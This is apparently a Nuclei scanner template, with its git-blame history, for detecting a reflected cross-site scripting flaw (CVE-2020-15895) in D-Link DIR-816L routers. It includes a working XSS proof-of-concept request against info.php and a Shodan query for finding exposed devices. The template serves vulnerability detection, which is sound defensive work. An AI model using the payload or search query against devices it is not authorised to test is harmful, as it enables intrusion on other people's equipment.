nuclei-templates/cves/2020/CVE-2020-15895.yaml

id: CVE-2020-15895

info:
  name: D-Link DIR-816L - Cross Site Scripting
  author: edoardottt
  severity: medium
  description: |
    An XSS issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter, before it's printed on the webpage.
  reference:
    - https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15895
    - https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-15895
    cwe-id: CWE-79
  metadata:
    shodan-query: html:"DIR-816L"
  tags: cve,cve2020,dlink,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert(document.domain);"
          - "DIR-816L"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
Add CVE-2020-15895 2022-09-30 12:39:49 +00:00			`id: CVE-2020-15895`

			`info:`
updated name 2023-02-09 05:23:09 +00:00			`name: D-Link DIR-816L - Cross Site Scripting`
Add CVE-2020-15895 2022-09-30 12:39:49 +00:00			`author: edoardottt`
			`severity: medium`
			`description: \|`
			`An XSS issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter, before it's printed on the webpage.`
			`reference:`
			`- https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-15895`
Auto Generated CVE annotations [Fri Feb 10 09:00:43 UTC 2023] :robot: 2023-02-10 09:00:43 +00:00			`- https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/`
			`- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169`
Add CVE-2020-15895 2022-09-30 12:39:49 +00:00			`classification:`
Auto Generated CVE annotations [Fri Feb 10 09:00:43 UTC 2023] :robot: 2023-02-10 09:00:43 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
Add CVE-2020-15895 2022-09-30 12:39:49 +00:00			`cve-id: CVE-2020-15895`
Auto Generated CVE annotations [Fri Feb 10 09:00:43 UTC 2023] :robot: 2023-02-10 09:00:43 +00:00			`cwe-id: CWE-79`
fix-matcher 2023-02-02 06:50:19 +00:00			`metadata:`
			`shodan-query: html:"DIR-816L"`
Add CVE-2020-15895 2022-09-30 12:39:49 +00:00			`tags: cve,cve2020,dlink,xss`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"`

			`matchers-condition: and`
			`matchers:`
fix-matcher 2023-02-02 06:50:19 +00:00			`- type: word`
			`part: body`
			`words:`
			`- "alert(document.domain);"`
			`- "DIR-816L"`
Add CVE-2020-15895 2022-09-30 12:39:49 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

fix-matcher 2023-02-02 06:50:19 +00:00			`- type: status`
			`status:`
			`- 200`